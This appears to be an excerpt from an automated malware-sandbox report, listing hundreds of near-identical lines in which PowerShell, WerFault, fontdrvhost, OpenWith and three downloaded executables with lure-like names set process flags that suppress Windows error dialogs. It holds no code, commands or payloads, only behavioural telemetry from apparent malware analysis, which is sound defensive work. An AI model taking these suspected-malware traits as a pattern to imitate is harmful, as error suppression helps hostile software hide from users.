                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Downloads\contry_solution_vibecall_e.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Documents\soundsolution_vibecall_c.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Downloads\videosolution_vibecall_b.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\OpenWith.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\OpenWith.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\OpenWith.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\OpenWith.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\OpenWith.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\OpenWith.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
